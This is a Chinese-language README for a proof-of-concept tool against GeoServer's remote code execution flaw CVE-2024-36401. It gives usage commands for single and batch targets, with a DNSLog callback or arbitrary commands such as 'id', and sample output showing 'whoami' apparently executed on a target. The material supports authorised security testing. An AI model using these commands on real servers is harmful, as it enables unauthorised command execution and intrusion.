⚠️ 免责声明: 此工具仅供安全研究与合法授权测试使用,请勿用于非法用途。使用者需自行承担法律责任。
README Version: [English | 中文]
本脚本是针对 GeoServer 的远程代码执行漏洞(CVE-2024-36401)开发的 PoC(Proof of Concept)探测工具。该漏洞允许攻击者通过构造特定请求,在目标服务器上执行任意命令。
请确保你的运行环境已安装以下依赖项:
requestslxml可通过以下命令安装所需依赖:
pip install requests lxml
python poc.py -u http://target.com -d dnslog.example.com
或指定要执行的命令:
python poc.py -u http://target.com -c "touch /tmp/vulntest"
准备一个包含多个目标 URL 的文本文件(每行一个):
python poc.py -uf targets.txt -d dnslog.example.com
或指定命令:
python poc.py -uf targets.txt -c "id"
详细使用说明: 详细使用说明文档
⚠️ 注意:
-d和-c参数不可同时使用。
[INFO] 爬取到3个有效的 Typenames,开始漏洞探测
[INFO] 目标: http://example.com
[INFO] 执行命令: whoami
[INFO] DNSLOG地址:
[INFO] 正在尝试 typeName: topp:states -> whoami
[+] 命令疑似成功执行!目标: http://example.com 命令: whoami
/geoserver/wfs 接口的访问来源。欢迎提交 Issue 或 Pull Request 来帮助改进此项目。
该项目采用 MIT 许可证,你可以自由修改、分发、商业使用,但必须保留版权声明。
| 参数 | 描述 |
|---|
-u, --url | 指定单个目标地址 |
-uf, --url-file | 指定包含多个目标 URL 的文件路径 |
-d, --dnslog | 指定 DNSLog 地址 |
-c, --command | 指定要在目标系统上执行的命令(如:whoami, id, curl 等) |